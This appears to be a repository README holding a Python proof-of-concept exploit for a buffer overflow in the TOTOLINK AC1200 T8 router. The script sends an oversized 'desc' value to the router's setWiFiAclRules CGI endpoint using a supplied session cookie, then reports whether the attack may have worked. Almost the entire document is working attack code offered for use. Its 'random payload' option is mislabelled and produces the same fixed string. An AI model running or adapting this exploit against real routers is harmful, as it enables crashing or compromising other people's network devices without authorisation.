README.md
Rendering markdown...
import requests
import sys
import time
if len(sys.argv) != 5:
print("Example : exploit_totolink.py <target_url> <session_cookie> <payload_size> <random_payload (yes/no)>")
sys.exit(1)
target_url = sys.argv[1] # e.g., http://127.0.0.1/cgi-bin/cstecgi.cgi
session_cookie = {"Cookie": sys.argv[2]} # e.g., SESSION_ID=2:1721039211:2
payload_size = int(sys.argv[3]) # Payload size
random_payload_option = sys.argv[4].lower() == 'yes' # Use random payload if 'yes'
print("""
Developed by Vidura Ranathunga
====================================================================
[!] Exploiting TOTOLINK AC1200 T8 Buffer Overflow Vulnerability
""")
def generate_random_payload(size):
return 'b' * size # Basic payload; you could enhance this with randomness if needed
def exploit_totolink(url, session_cookie, payload_size, use_random):
if use_random:
payload_desc = generate_random_payload(payload_size)
else:
payload_desc = 'b' * payload_size
data = {
"topicurl": "setWiFiAclRules",
"addEffect": "1",
"mac": "111",
"desc": payload_desc,
}
try:
response = requests.post(url, cookies=session_cookie, json=data)
print("Response Status Code:", response.status_code)
print("Response Text:", response.text)
if response.status_code == 200:
print("Exploit may have been successful.")
else:
print("Exploit failed with status code:", response.status_code)
except Exception as e:
print("An error occurred:", e)
if __name__ == "__main__":
print(f"""
============================================================
[!] TOTOLINK AC1200 T8 Exploit
-----------------------------------------------------------
[*] Target URL: {target_url}
[*] Session Cookie: {session_cookie}
[*] Payload Size: {payload_size}
[*] Random Payload: {'Yes' if random_payload_option else 'No'}
""")
exploit_totolink(target_url, session_cookie, payload_size, random_payload_option)